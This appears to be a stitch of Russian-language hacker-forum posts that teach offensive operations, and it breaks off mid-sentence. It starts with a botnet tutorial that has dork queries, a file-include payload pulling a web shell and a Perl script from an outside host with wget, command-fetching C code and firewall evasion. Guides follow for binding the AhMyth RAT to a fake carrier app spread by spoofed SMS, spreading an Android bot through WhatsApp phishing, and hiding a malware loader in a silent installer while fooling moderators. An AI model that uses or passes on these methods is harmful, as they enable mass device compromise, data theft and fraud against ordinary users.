Тогда запрос будет выглядеть так: inurl:botnet.php intitle:Botnet Center или botnet.php intitle:Botnet Center. Видишь
как все просто? А вот, допустим, тебе понадобилось найти этот скрипт на сайтах в зоне .ru: botnet.php intitle:Botnet Center site:ru. Вот примерно так выглядят запросы. "А вот как тот червь искал старые phpBB?" - спросишь ты. Если ты наблюдателен,
то мог заметить, что в конце старницы этого форума виднелась надпись "Powered by phpBB 2.0.10". Таков и будет запрос . А
вот, к примеру, тебе надо найти файл, содержащий строку "Hell Knights", а расширением файла обязательно должно являться .txt.
Запрос примет вид: Hell Knights filetypext. Или другой пример - надо найти директории Apache, показывающие листинг файлов
в корне WWW-директории: intitle: Index of \
Вообщем-то, запросов море, главное фантазия. Зайди обязательно на сайт Джонни, найдешь много интересного для себя. Допустим,
мы уже нашли скрипт с php-инклуд багом l33t.php?page=news.html. Параметр page открывает страницу news.html. Запрос для google: inurl:l33t.php?page=news.html. Создаем сокет:
$socket = IO::Socket::INET->new(PeerAddr=>"http://google.ru/",PeerPort=>"80",Proto=>"tcp"), затем отправляем запрос
гуглу посредством GET: print $socket "GET /search?q=inurl:l33t.php?page=news.html&hl=ru&lr=&start=90&sa=N HTTP/1.0\n\n";.
Затем мы откапыаем в HTML-коде ссылки (<a href=...) и "заходим" по ним,
подставляя в параметр page свое новое значение:$cmd=http://1nf3ct0r.nm.ru/hack/cmd.php&cmd=wget -O smile.php http://1nf3ct0r.nm.ru/hack/shell.php; wget -O post.pl http://1nf3ct0r.nm.ru/worm/post.pl; perl post.pl; rm post.pl;
Что же мы сделали? Итак, команда wget - это команда скачки какого-либо файла из сети на шелл. Чаще всего используется она,
но все же ее может и не быть. Поэтому дам тебе совет: попробуй заставить все известные качалки (wget, fetch, get, lynx,
curl, links) скачивать файл из сети. Вот синтаксис этих штук:Wget: wget -O /tmp/script.pl http://1nf3ct0r.nm.ru/hack/script.pl
Curl: curl --output /tmp/script.pl http://1nf3ct0r.nm.ru/hack/script.pl
Fetch: fetch -o /tmp/script.pl http://1nf3ct0r.nm.ru/hack/script.pl
GET: GET http://1nf3ct0r.nm.ru/hack/script.pl > /tmp/script.pl
Links: links -source "http://1nf3ct0r.nm.ru/hack/script.pl" > /tmp/script.pl
Lynx: lynx -source "http://1nf3ct0r.nm.ru/hack/script.pl" > /tmp/script.plСначало мы закачали вэб-шелл с http://1nf3ct0r.nm.ru/hack/shell.php и назвали
его smile.php. Затем слили perl-скрипт, который сообщит в лог файл POST- запросом где находится скрипт (пиши сам), запустим
его и удаляем этот скрипт. Если тебя заинтересовала данная тема, то советую почитать статью n4n0bit'a с нашего сайта
hellknights.void.ru - она называется "Боты поисковых машин". Вчитывайся, там раскрыты все основные проблемы.
Но не одними шеллами ограничивается *nix-ботнет. Существуют и черви и вирусы под *NIX! О них я как-то писал в своей статье
"Вирусы, изменившие мир", которую ты также можешь найти на http://hellknights.void.ru/.
Например, червь Li0n атаковал BIND версий 8.2 - 8.2.3, которые содержали в себе уязвимость TSIG-запросов, после проникновения на машину он устанавливал t0rn-руткит -
простейший руткит, протроянивающий системные приложения вроде ps, ls, netstat и т.д. Shadow-пароли (/etc/shadow/) и файл
с логинами (/etc/passwd) он слал на мыло автору. А червь Slapper (Modap/Cinik) атаковал модуль OpenSSL 0.9.6d вэб сервера
Apache, получая при это привилегии привелегии, из под которого и был запущен апач (nobody, www, apache и т.д).
Использовался он как раз-таки как DDoS-бот. Или есть еще один вариант: твой червь будет устанавливать на взломанные тачки свой DoS-софт, через который и будет проводиться атака.
Также существует такая прекрасная штука, как ICQ. Я думаю говорить что это такое - нет смысла. Это есть то, что мешает
работать, учиться и вообще, предмет, на который можно свалить все свои неудачи . Так вот, именно проткол ICQ (TOC, с января
2006'ого это уже вторая версия проткола, непонятно зачем переделанная) можно использовать для управления бэкдорами. Самое
примечательное - это анонимность. А ведь можно сделать целую распределенную сеть ботов с управлением через ICQ.
Несмотря на то, что данная система кажется сложной - все достаточно просто! Все также основано на работе с сокетами. Получем
команду и выполняем ее через ShellExecute(). Если юзер что-то заподозрит, то обломается: сетевая активность происходит через
ICQ-сервер. Но об этом как нибудь в другой раз. Все, хватит. Дадим оценим методик с шеллами:Плюсы [ + ], Минусы [ - ], Спорно/Нейтрал [~]:
[~] Система управления ботнетом выполнена на твердую "4", несмотря на то, что на PHP можно сделать
сборку по странам, чекер шеллов и многое другое. Ведь запускается цикл по "раздаче" команд
ботам - это, безусловно, займет n'ое количество времени. Чтобы шеллы добавлялись автоматически
можно написать скрипт, который бы находил URL до шелла и отправлял его POST-методом на скрипт
управления ботами, добавив в БД, а затем уничтожив себя.
[ + ] Нету убогих диалаповых машин, все серваки с широким каналом.
Постоянный онлайн ботнет.
[~] Шелл очень просто найти и удалить
Но зато нету проблем с антивирусным ПО.
[ + ] Переносимость ботнета.
Скопировал адреса шеллов, свалил на другой сервак.
[~] Нужна определенная квалификация для написания скриптов, зависящая от их функционала.
Так, что нубам можно забыть об этом и купить соответствующие книжки
[~] Проследить откуда поступала комманда - достаточно просто: логи апача еще никто не отменял.
Но ведь можно и логклинер встроенный в nix-бота поставить или еще чего такого .
Все же это не так палевно, как с централизованными сетями, о работе которых я тебе сейчас расскажу+-------------------------+
| Централизованные сети |
+-------------------------+Как это? Ну во-первых скажу, что по такому принципу работают практически все DDoS-боты. После запуска трояна на компьтере,
он сам коннектится к ботнет-серверу. Все прелести налицо. Но также много неприятных моментов. При исследовании бота очень
просто просечь сервер, куда он коннектится. Полетят абузы, грохнут сервер (или, быть может, сам рухнет?) - ботнет не вернуть.
Существует как минимум два метода управления такой DDoS-армией: первая - это, безусловно, IRC - одна из самых старых
технология управления ботами, постепенно теряющая свою актуальность. И вторая - это управление через HTTP: молодая и
ежедневно процветающая технология: простота, удобность - все тут.
Разберем каждый пункт конкретнее. К сожалению, microsoft не позаботилась о IRC, поэтому
не ищи функций WinAPI под нее. Ее придется писать самому. Кроме того, придется поднимать свой IRC-сервер, ты же не будешь
держать стадо ботов на канале #l33t-botnet в сети DalNet? Настроить свой IRC не так сложно, если не вдаваться в
дополнительные в его параметры настроек. Советую почитать статью "IRC- плацдарм для ботов" из журнала "хакер #78", ссылку на нее ты найдешь в конце статьи. Прежде чем ты примишься за ниписание IRC-бота тебе надо разобраться с IRC-протоколом, чем я тебе и помогу. Также советую почитать RFC 1459. Начнем. Телнетимся к серверу:#telnet irc.botneta.net XxxX
XxxX - это порт. Причем порт может быть разным, например если кодировка нужна KOI8-U, то мы коннектимся на 6667 порт.
Вот все порты:6667: KOI8-U 7770: KOI8-R 7774: Macintosh 6668: Translit 7771: utf8 7775: Translit
6669: utf8 7772: CP866 7776: KOI8-U 7773: ISO-8859_5 7777: Alt.TranslitЕсли коннект прошел успешно, а-ля появились строки вроде:
:Infinity.botneta.net NOTICE AUTH :*** Looking up your hostname...
:Infinity.botneta.net NOTICE AUTH :*** Found your hostnamenick твой_ник
Затем:
user имя_юзверя хостнейм irc.botneta.net :твой_ник твой_второй_ник.Все, мы авторизировались. Чтобы войти на канал набирай:
join #канал
Чтобы отправить сообщение набирай:
privmsg #канал :сообщение w00t ppl!! =)
Есть еще такая важная штука как PING-PONG. Нет, это далеко не игра. Сервер может в любое время послать сообщение PING,
на которое клиент должен быстро ответить PONG, иначе конннект оборвется. Зачем это надо? Для того, чтобы проверить,
является ли клиент соедиененным с IRC-сервером или нет. Вот этого всего хватит для того, чтобы начать писать бота.Поверь, написать это все очень просто. Если какие проблемы - то посмотри исходники разных ботов и заюзай google, а потом пиши мне
А теперь перейдем к управлению через HTTP. Тебе не придется разбираться с протоколом, так как у нас уже есть наборы
функций для работы с ним. Мне известны по крайней мере два: Internet API и UrlMon API. Кроме того, помимо работы с HTTP
они поддерживают работу с FTP-протоклолом. Приступим. Итак, какие есть методы получения команд ботами? Соглашусь, не так уж и много, но нам этого хватит сполна. Первый способ заключается в том, что боты будут читать команды из .txt-файла. Причем команды можно шифровать каким-нибудь алгоритмом, а ключ шифрования скормить трояну (с соответствующей функцией дешифровки). То есть, все трояны будут бесконечно скачивать файл из сети и пропарсив его содержимое, выполнять соответствующие команды. Кажется геморно, но на самом деле все круто . Команды можно добавлять через PHP-скрипт и держать их там определенное время. Все это с таким же успехом реализуется на C++, работая с сокетами.Сначало шлем GET-запрос на файл с командами, затем создаем сокет и коннетимся.
#define HELL "hellknights.void.ru"
char *sendb = "GET /botnet/cmds.txt HTTP/1.0\r\nHost: "HELL"" \r\n\r\n", // формируем GET-запрос
recvb[2048];SOCKET socket = socket(AF_INET,SOCK_STREAM,0); // создаем сокет
memset(recvb,0,2048);// заполняем структуру
SOCKADDR_IN host;
host.sin_addr.S_un.S_addr = resolve(HOST); // резолвим
host.sin_family = AF_INET; // уже писал
host.sin_port = htons(80); // 80 портif(connect(socket, (struct sockaddr *)&host,sizeof(SOCKADDR_IN))) // коннетимся
return -1;send(socket, sendb, strlen(sendb),0); // шлем пакет
Получаем пакет:
Sleep(5000); // здесь желательно поставить sleep, чтобы дождаться ответ от сервера
int i;
while(i = recv(socket,recvb+strlen(recvb),1,0))
{if (i == SOCKET_ERROR) return -1;}А вот и функция резолва:
DWORD resolve(char host)
{
DWORD ret = 0;
struct hostent * hp = gethostbyname(host);
if (!hp) ret = inet_addr(host);
if ((!hp)&&(ret == INADDR_NONE)) return 0;
if (hp != NULL) memcpy((void)&ret, hp->h_addr,hp->h_length);
return ret;
}После нам придется пропарсить .txt на наличие команд. Я думаю, ты справишься с этим, ничего сложного
нет. Есть еще один вариант: не юзать GET, а вопспользоваться функцией WinAPI - InternetOpenUrl() для получения команд ботами.
Но есть одно но! А ты не подумал, что боты сами могут тебя задосить!? Вот-вот! Придется брать себе абузоустойчивый дедик,
с широким каналом, который стоит не так мало (50$-200$ в месяц и более).
Есть другой метод: пишется скрипт, который бы отображал ботов в своей таблице. То есть боты сначало бы коннетились к скрипту и добавляли себя в список: IP-адрес, UID, версия ОС, имя компьютера, страна, скорость соединения и количество времени в онлайне. Затем, полсе того как бот коннетится к скрипту и прочее, мы выполняем команду и запускается цикл по раздаче команды всем ботам по той самой таблице. Более медленный, но за то более экономный и беспалевный метод. Все написание
также основывается на всем том, что мы с тобой рассматривали выше.
Передать данные скрипту можно также при помощи Internet Explorer, а также функций WinExec() и CreateProcess(). (кстати, что касается WinExec - это устаревший вариант, использующийся еще аж в Win16-системах, в win32 же корректнеее будет использовать
CreateProcess(), но WinExec по прежнему работает отлично).
Заполним все структуры которые нам нужны, как это мы делали с тобой чуток ранее. И вызываем CreateProcess():CreateProcess("EXPLORER.EXE","http://hellknights.void.ru/botnet/?msg=w00t!0wn3d",0,0,false,CREATE_NEW_CONSOLE,0,0,&si,&pi);
&si - это указатель на StartUpInfo, а &pi - указатель на ProcessInformation. Этот метод также примечателен тем, что у нас
возникает минимум проблем с файрволом, что не может не радовать . Этого, конечно, не достаточно для полного его обхода,
можно намутить хитрый Process Injection в доверенный процесс. Вообще есть
куча методов для обхода файров, особенно в ring0. В качестве доверенного приложения можно выбрать браузеры или svchost.exe,
который записан во всех файрволах как доверенное приложение и которому разрешено лезть на 80 порт.
Если ты его заблокируешь в файрволе, то не сможешь лезть на 80 порт . Но мы не об этом. Также не забудь в структуре STARTUPINFO указать невидимость окна:si.wShowWindow = SW_SPOILER;
Здесь у нас существует такая проблема, как путь до папки C://Program Files/Internet Explorer/. Решить эту проблему нам
поможет константа %Programfiles%. Но это тоже не самый лучший вариант, так, что покопайся с функциями SHGetSpecialFolderLocation() и SHGetPathFromIDList(), через которые мы и узнаем все системные директории Windows, думаю ты
без проблем разберешься .
Что же касается XOR-шифрования, то и в PHP и C++ есть специальная функция. Работает это примерно так:ксоренный_текст=наш_текс^ключ_шифрования;
Короче говоря, символ "^" и является тем страшным ксором. Дешифровка производится точно также.
Плюсы [ + ], Минусы [ - ], Спорно/Нейтрал [~]:
[ + ] Удобное управление через скрипт. Боты сами коннектятся куда надо.
Можно реализовать достаточно многофункционального DDoS-бота. Все функции для работы с HTTP
давным давно реализованы в WinAPI библиотеках.
[~] Боты довольно быстро попадают в антивирусные базы.
Хотя при правильном распространении и техник-стелсирования продержаться они могут очень долго
[~] Управление через IRC.
Управление через IRC - не самый сладкий "мед". Хотя многие так привыкли, что на web их перетащить уже просто
невозможно . Кроме того, для написания системы управления через IRC надо разобраться с IRC-протоколом
[~] Не так уж просто написать матерого бота.
Проблемы с файрволом, антивирусом, автозагрузкой + куча времени на написание разных примочек...
c ботами спалят, то мигом закроют, а боты умрут... Но несмотря на это, бот может быть намного функциональнее
чем ботнет на шеллах.
[ - ] Достаточно просто отследить куда коннектится бот.
Однажды мне попал в руки какой-то бот и адрес ботнет сервера я просек в логах файрвола.
Итог: увел скудный ботнет.
[ - ] Тяжелый перенос ботнет сервера.
Придется заставлять ботов скачивать и запускать еще одного троя, а себя грохнуть. Кроме того если сервер
c ботами спалят, то мигом закроют, а боты умрут... Но я тут поразмышлял и пришел к такому алгоритму:
- чекаем cmd.txt на наличие команд
- если таковой файл есть, то парсим его и выполняем команды
- если сервак не пашет, то пытаемся приконнектиться еще раз и еще раз через 30 минут и т.д
- если совсем все фигово, то начинаем скачивать второй файл с какого- нибудь b0tn3t.narod.ru
свою EXE'шки и запускать - работать будет неплохо+-------------------------+
| Децентрализованные сети |
+-------------------------+Самым продвинутым вариантом управления ботами является распределенная децентрализованная сеть. О сложности реализации такой
сети тоже можно говорить очень долго. Суть заключается в том, что каждая зараженная машина коннетится с другой, постоянно
держав соединение с ней, благодаря этому все тачки передают команды друг другу, то есть отсутствует центральный сервер! Для
того, чтобы заставить ботов выполнить какую-либо команду, достаточно приконнектиться к какой-нибудь зараженной машине на
backdoor-порт и отдать команду, к пример icmp microsoft.com (ICMP-флуд мелкомягких). Эта тачка разошлет сама всем команду.
Как тебе? Кроме того, можно (даже нужно) добавить сканирование IP-адресов на наличие трояна в системе (по порту), хотя
это достаточно палевно. Сам пакет может быть "уникален" - иметь свою цифровую подпись. Ну вот прикинем самую простую
децентрализованную сеть. У нас имеется локальная сеть 127.0.0.1 - 127.0.0.150. В ней имеется 150 тачек. Допустим мы нашли
какую-то супер багу и написали червя (авторутер локалки ), который бы сканил эти адреса на 31337-порт (там вертится бажный
сервис) и атаковал его, заливая и запуская свою копию на каждую машину. Итак, сеть протроянена. Теперь, при каждом
автозапуске трояна биндится шелл на 800 порту, а каждый червь коннектится
со следующим, по следующему алгоритму:
[1] запускается скан на 127.0.0.2
[2] если порт 800 открыт, то коннетимся к нему и заставляем
коннетиться следующего на 127.0.02.
[3] если уже сконнетился кто-то ранее, то коннектимся на 127.0.0.03 и т.д
[4] повторяем на приконнекченной тачке то, что сделала та, что коннектится: все с пункта #1 приплюсовав к IP + 1 =)
Это самая примтивиная схема. Можно научить ботов пополнять базу IP-адресов захваченных машин, диапозонов IP-адрессов и т.д.
Честно говоря, реализаций таких методов ниразу не видел в паблик- источниках. Но ходят слухи, что такая система реализована,
да и не один раз =) Так, что дерзай! Жду твоих работ! =))Плюсы [ + ], Минусы [ - ], Спорно/Нейтрал [~]:
[ + ] Удобное управление.
Нет централизованной сети - мечта хакера. Чтобы заставить ботов выполнить что-то достаточно отдать одному
соответствующую команду и он разошлет ее остальным ботам.
[ - ] Боты довольно быстро попадают в антивирусные базы + палевное сканирование IP-адресов
Хотя при правильном распространении и техник-стелсирования продержаться они могут очень долго
Любой файр достаточно просто определит сканирование портов
[ - ] Сложное написание.
За этой системой - будущее. Но реализовать задуманное не так-то просто. Делай выводы.
[ + ] Практически невозможно отследить узел, откуда пошла команда
Анонимность гарантирована, но все равно VPN/Socks/Proxy не помешал бы Можно также отдать команду
зараженной машине через PHP-гейт, что даст возможность еще больше скрыть свою причастность к ботнету
[ + ] Стойкость ботнета
Как ты его разрушить захотел? Все зависит от пользователя.[DoS-атаки: реализация]
Существует огромнейшое количество видов DoS-атак, например, SMURF-flooding, SYN-flooding, UDP-flooding, ICMP-floodig, SMBDie
attack, Ping of Death, HTTP-flooding и т.д. Ни одним флудом ограничиваются DoS-атаки. Как тебе уже известно, DoS (Denail of
Service) - это атака на отказ в обслуживании. DoS-атаку можно воспроизвести при помощи какого-либо багClick to expand...
Всем доброго дня,кто подскажет,или поделится софтом для проверки на валид почт
RU
Заранее спасибо!!!
Добрый день, дорогие форумчане. Сегодня я хочу разобрать такую тему как массовый взлом. Да, это будет не так просто, но интересно. Поэтому без лишних слов приступим к делу.
План работы и схема
И так, давайте рассмотрим наш план действий:
Представим такую ситуацию. Каждый из нас знает, что операторы связи (Билайн, Теле2, МТС и др) рассылают своим пользователям частенько обычные сообщения. Это может быть реклама или сообщения о том, что закончился тот же мобильный интернет. Было? Вот в один из таких случаев жертве приходит сообщение. В нем указано, что-то связанное с новым приложением или программой от разработчиков. Как это все делать на примере я покажу ниже. Он как неопытный пользователь решает его скачать. Вот тут то и запахло жареным. Нет, он не обнаружит вшитый вирус. Просто его данные уже будут не его. Теперь рассмотрим туже ситуацию только со стороны хакера. Это будет в разделе практики.
Практика
Вот здесь давайте рассмотрим подробности нашей работы. Для начало берем базу телефонов. Я дам вам две базы, а дальше фильтруйте сами, я только покажу как.
Берем все базы здесь: https://xss.is/threads/31589/
Чтобы определить нужного вам оператора связи берем начало номера телефона. Допустим +79602345678. После семерки идет наш оператор. Все они приведены ниже:
Билайн : диапазон от 903 до 909 (старый), от 960 до 976 (новый).
МТС : диапазон от 910 до 919 (старый), от 980 до 989 (новый).
Теле2 : отдельные номера 900, 901, 902, 908, 953, 958, 904, 950, 951, 952,
991, 992, 993-999.
Мегафон : диапазон от 920 до 928 (старый), от 929 до 937 (новый).
И так. Для тех кто не понял. Берете базу выше. И ищите нужного вам оператора по диапазонам. То есть если к примеру после +7 идет 902 то у данного номера оператор связи Теле2. Надеюсь я объяснил доходчиво. Идем дальше.
Теперь нам нужно как-то разослать сообщение примерно такого типа:
Я объясняю на примере Билайн. Дальше уже подбирайте сами. Просто меняйте название Beeline на нужное вам и все. Теперь переходим [сюда](https://sip- system.com/).
На sip-system.com у нас услуга подмены номера. Но нам нужна именно рассылка сообщений. Думаю как действовать разберетесь. Для начало переходите в регистрацию и выбираете Аккаунт для флуда (здесь придется заплатить). После скачиваете софт. Но для получения пароля от архива придется потрудиться. Думаю вы разберетесь. Двигаем к созданию нашего вируса. Я работал наWindows , поэтому использовал программу с названием AhMyth RAT. Думаю вы о ней знаете. Идем [сюда](https://github.com/AhMyth/AhMyth-Android- RAT/releases) и скачиваем нашу заветную программу. Потом запускаем. И в открывшейся вкладки видим это:
И так. Вводим порт 42474 (можно и без этого конечно) и кликаем Listen. Теперь переходим во 2 вкладку. Там мы в Source IP вводим наш IP адрес. Да, здесь уже показывали подробную инструкцию по эксплуатации данного софта, но все же я повторюсь. IP нам потребуется внешний. Не локальный. Узнать его можно здесь. Данный сайт успешно себя зарекомендовал, поэтому советую использовать именно его. Теперь после этой всей мути нам нужно склеить наш маленький вирус с программой. Нужно официальное приложения. К примеру тот же My Beeline. Надеюсь вы поняли, что искать. После загружаем программу себе на комп, а именно apk 'а файл и кликаем Bind With Another Apk. Там ищете свою программу и склеиваете с вирусом . Так, объясняю сразу. Могут возникнуть проблемы с софтом. Если у вас не работает AhMyth Rat , то в большинстве случаев это происходит из-за необновленной версииJava или вообще ее отсутствие. Чтобы это решить идете на сайт. И скачиваете. После переустанавливаете прогу и все по новой. Как наш файл приготовится нужно обзавестись хостингом. Кто не хочет платить идете сюда и используете временную бесплатную версию от RegRu. Создаете автоматическую загрузку файла на устройство жертвы. Как? Все делаете легко и просто.
Создаем PHP файл. Открываем его через блокнот и пишем это:
PHP:Copy to clipboard
<?php
header("Content-disposition: attachment; filename=названия файла.apk");
header("Content-type: application/octet-stream");
header("Content-Description: File Transfer");
readfile("путь к файлу");
?>
Заливаете на сайт и все. Если не получилось попробуйте залить наш вирус на сайт и указать в readifile ссылку как путь к файлу расположенный на нашем сайте (https://путь к файлу/). Теперь дело за малым. А именно распространения. Перед этим мы берем нашу готовую ссылку на сайт с автозагрузкой и сокращаем ее. Вот вам три сайта для этого дела:
Использовать можете какой угодно. После просто вводите эту ссылку в сообщения для флуда. Его я оставил выше. Надеюсь объяснил понятно и просто.
Вывод
Вот таким не хилым способом можно провести массовый взлом телефонов. Сказать, что очень сложно нельзя, но все же легким это тоже не назовешь. Здесь все зависит от жертвы. Насколько она умна, чтобы ввестись на такое. Да, все сайты представленные мною не являются рекламой. Я использую их сам. Ну а на этом у меня все. Удачи
автор @Pr0_ogrammer
взял с codeby
Привет, осваиваю тему по тихонечку - подскажите где лучше смотреть пратнерки под рассылки?
Ищу редики под рассылку, подойдут уведенные домены, а так же домены от
цпанелей и т.д.
Обьемы около 1к в неделю, возможно больше. Возможность добавить вайлдкард * .
(через вас).
Связь ПМ.
В этот раз будем говорить о инсталлах на Android, о инсталлах со спама мессенджеров. Рассмотрим конкретно WhatsApp, но способ подойдет под любой мессенджер, будь это Viber, Telegram и им подобные.
Подготовка к танцам
Начать наверно следует с выбора софта, для спама. Ведь Android бот ~~Anubis~~
уже у вас есть, да? Я покажу вам софт который использую я, но вы можете брать
любой другой, я ничего не рекламирую, покупать тот или иной софт никого не
призываю.
Я использую данный софт -
https://************/discussion/thr...x-mnogopotochnyj-kombajn-dlja-
whatsapp.48441/
Вы можете брать любой другой, главное чтобы у софта были бы такие функции как:
Остальные нужные функции и так есть во всех софтах по спаму WhatsApp, не стал
их уточнять. Перед покупкой такого софта, спросите у автора, как шлет в данный
момент, как идет дела с регой, как часто баны, сколько сообщений уходит с
новорега, сколько с прогретого аккаунта. И там сами смотрите, пойдет ли такой
обьем вам, или не пойдет.
В общем тщательно изучите рынок перед покупкой.
Дальше следует определиться с разводкой, под каким предлогом люди будут качать
нашу малварь. Я использую вариант с обновлением WhatsApp. Делаю ленд, копию
Google Play страницы, и делаю рассылку с текстом, что якобы версия WhatsApp
устарела, была взломана злыми хакерами, больше не поддерживается, данные все
могут попасть в руки злоумышленников, нужно срочно переходить по ссылке и
обновлять. Вариантов много, зависит от вашей фантазии. Можно сделать какой
нибудь конкурс от известной компании. "Установи наше приложение, и участвуй в
розыгрише iPhone XS"
Важно чтобы лили именно на лендинги, на прямые ссылки конверт будет ниже, или
его вообще не будет. Лендинг должен содержать инструкцию для чайников, что
качать, где качать, зачем качать, как установить. У многих отключена установка
приложений их неизвестных источников, поэтому после того как человек скачал,
он должен увидеть инструкцию как включить эту установку приложений, и куда
вообще нажимать после того как файл загрузился.
Следующий момент это TDS, и домен. На рынке достаточно TDS, Keitaro, Black TDS, Shadow TDS (не уверен на счет Shadow, раньше только ей пользовался, на экспе продавалась, сейчас не знаю есть ли.) Берем что больше подходит нам по цене, по душе, там сами смотрите. Нам от TDS нужна только стата, и чтобы весь не нужный трафик направляла куда по дальше. Android на лендинг, остальное в Google, или куда угодно.
Допустим с TDS определились, сейчас домен, сервер. Имя домена зависит от
разводки, от ленда. Хоть и некоторые берут просто любой домен, ставят ленд
который никакого отношения к имени домена не имеет. Я так не люблю, всегда
стараюсь сделать чтобы домен был под ленд. К примеру если это обновление
WhatsApp, ленд копия Google Play, то домен стараюсь делать по максимуму
похожим на рельный, официальный домен Google Play. Ну суть поняли, я думаю.
Сервера я обычно беру простые, самые дешевые. Кого то конкретно рекомендовать
не буду, точно посчитают что реклама.
Да начнуться танцы
После того, как мы всё купили, всё подготовили, можно приступать к работе.
Начнем регистрировать аккаунты WhatsApp. Если слать будете обновление, то
аккаунты делаем с именем WhatsApp, на аватарку ставим иконку WhatsApp. В
статус можно написать WhatsApp Support, или что то такое.
Если не обновление, другая разводка, к примеру от Apple, ставим имя Apple,
аватарку Apple. Ну вы поняли.
И дальше есть два варианта, или слать сразу же с новорегов, или же прогревать
аккаунты. С новорегов уходит очень мало сообщений, может даже 1-2 сообщения
только уйти. С прогретых шлет хорошо, но тут своя магия у каждого, как кто
греет. Можете спросить у автора своего софта, они точно знаю как прогревать. Я
лично не прогревал, не люблю ждать. Вся суть прогрева в отлежке, и в общении.
Делаем текста по типу:
"о привет, я тебя видел вчера в магазине, это был ты? "
" привет, мне дали твой номер, сказали ты веб дизайнер. Это правда?"
И кучу разных таких сообщений. С акка по 1-2 сообщения, с большим интервалом.
Но как я и говорил, я не прогревал, регал акки, и сразу слал. Не жалко 2-3
рубля за номер отдать, пусть даже 1 сообщение отправит.
Вы уже сами смотрите, как хотите, можете греть, можете не греть.
Аккаунты мы нарегали, можно приступать к рассылке. Смотрим на рандомизацию,
это важно. Пример моей рандомизации -
{Hello|Hi|Hey|Hallo|Chao|Hola|Bonjour|Aloha|Ave}
То есть чем больше похожих слов мы подберем, тем лучше. Ссылок тоже нужно
несколько. Я на тысячу сообщений беру от 5 до 10 ссылок, сокращаю через любой
сервис.
Главное чтобы не было как у меня, взял в каком то левом сервисе сократил,
поставил рассылку, ушел пить, на следующий день админка как была пустая, так и
есть. Сервис оказывается упал, и весь мой трафик ушел в пи*ду.
ВАЖНЫЙ МОМЕНТ, про который я забыл сказать в начале статьи. Если мы не в
контактах получателя, то ссылка не будет активной, то есть просто как текст,
нажать на нее нельзя будет. Станет активной если получатель добавит нас в
контакты, или же ответит нам что нибудь. Без разницы что, можно даже смайлик.
Поэтому я пишу разводку, и в конце добавляю "напишите OK, если согласны,
напишите OK если прочитали, напишите OK если получили информацию" и так далее.
Могу сказать по опыту, что даже если ссылка не активна, всё равно люди ее
копируют, или руками пишут. Поэтому тут лучше будет, если ссылка короткая.
Такое есть только в WhatsApp, в других нет.
Как только приготовили текст, можем запускать рассылку, и ждать ботов.
Эпилог
Способ будет работать всегда, пока есть мессенджеры. Можно использовать под
что угодно, не только WhatsApp. Качество таких инсталлов будет лучше, чем с
биржи. Ну и дешевле чем покупать.
Если что то забыл, потом добавлю, но как бы все моменты учел. По вопросам
можете писать в жабу
installswithlove@thesecure.biz
Отвечаю всем, когда свободен, если не отвечаю, просто подождите, не бомбите.
Всем привет, всем пока.
Реальный способ получения живого, бесплатного трафика. Трафик отлично подходит
для:
- партнерских программ
- групп вконтакте
- сайтов и блогов по бизнесу
- p2p ресурсов
- продажи своих или партнерских курсов
- сбора подписной базы
- накрутки переходов
Скачать можно тут: [https://yadi.sk/d/l_KiJMPQE6EfEw]
К делу, создаём аккаунт в партнерской инстал-сети installcube.com
Регистрация свободна для распространителей софта — вебмастеров, но рекламодатели проходят модерацию. Мы — рекламодатели.
Прежде чем связаться с модератором, готовим внятные ответы на его вопросы о софте:
⠀⠀1. Что за софт и как он монетизируется?
Я просто ищу любой софт в гугле: никому не известный ускоритель
ПК или менеджер паролей. В нём должна быть
триальная версия и возможность покупки полной. Это — монетизация. Нет нужды
придумывать легенду.
⠀⠀2. Есть ссылка на лицензионное соглашение?
Регистрируем домен под название найденного софта. Создаем лендинг, на деле —
копируем официальный сайт софта. Важно заменить контактные данные на свои.
Модератор может попросить написать ему с указанной на сайте почты.
⠀⠀⠀⠀ Можно сделать только страницу с лицензионным соглашением, скопировать
туда текст из гугла или официального сайта, но домен всё равно куплен — лучше
подготовиться по максимуму.
⠀⠀3. Почта.
Любая ваша почта. Она станет логином для входа, а пароль выдаст модератор.
Пароль меняется в личном кабинете за пару кликов.
Экономя время, можно начать диалог с модератором, а после зарегистрировать домен и сделать лендинг с лицензионным соглашением.
Для связи я использую Telegram модератора
Старайтесь отвечать модератору с интервалом в 10–30 минут. Когда он спросит про лицензионное соглашение — у вас будет 30 минут чтобы его создать. Если ответы всегда были с интервалом, ничего подозрительного в задержке.
Подготовка завершена. Аккаунт получен, идём дальше.
Скачиваем Smart Install Maker с официального
сайта или [крякнутую версию](http://for-
masters.ru/windows/smart-install-maker) — не будет сообщений о пробной версии
при каждом запуске.
Устанавливаем свой “ускоритель ПК” и запускаем Smart Install Maker.
На первом экране меняем подчеркнутые поля на свои, после переходим во вкладку “файлы”.
Нажимаем “Добавить файлы из папки”.
Находим установленный “оптимизатор ПК”. Жмём два раза “ОК”.
Также ищем в списке стандартный “экзешник” удаления программы от нашего
“ускорителя ПК” и удаляем его.
Smart Install Maker создаст новый.
Добавляем свой “лоадер”.
⠀⠀1. Нажимаем “Добавить”
⠀⠀2. Выбираем файл лоадера.
⠀⠀3. Жмем “ОК”.
“Лоадер” появится в списке файлов. Проверьте.
⠀⠀1. Переходим в “Диалоги”.
⠀⠀2. Ставим галочку “Скрытая установка”
⠀⠀3. Переходим в — “Команды”.
Жмём “Добавить”, откроется новое окно.
Справа от поля “Команда” под стрелочкой с номером “1” нажимаем на кнопку, в открывшемся списке файлов выбираем “лоадер” и жмём “ОК”.
Для поля “Когда выполнять” выбираем “После распаковки”. Жмём “ОК”.
Готово. Во кладке “Проект” нажимаем “Компилировать”.
Проверим “Инсталлер”. Если вначале вы не меняли путь, то “Setup.exe” будет лежать в “Документах.
Перед проверкой “Инсталлера” удаляем “оптимизатор ПК” любым удобным способом — через “uninstall.exe” или “Установку и удаление программ”. Он больше не понадобится.
Запускаем “Setup”.
Мы сделали установку скрытой, процесс вы не увидите но в “Program Files” появится новая папка.
Если установилось — все сделано правильно. Дальше для работы нам понадобится этот “Setup.exe”.
Промежуточный итог.
У нас есть аккаунт в Installcube и готовый “Инсталлер — Setup.exe”. Осталось настроить кампанию и лить инсталлы. Заходим в Installcube и создаём новую кампанию.
Редактируем поле “Название” на что-то непримечательное, а “Статус работы” переключаем на — приостановлено. Это важно, запустим кампанию когда ее одобрит модератор.
“Слоты кампании” — выбираем тип программы. У меня — “Ускоритель ПК”.
“Метод загрузки” — ставим как на скрине.
“Указать URL” — прямая ссылка на инсталлер. Можно залить на хостинг с
лендингом.
Важно!
После создания кампании, её будет проверять модератор. Чтобы модератор не
нашел “малварь”, на данном этапе по ссылки с которой ее должен скачивать
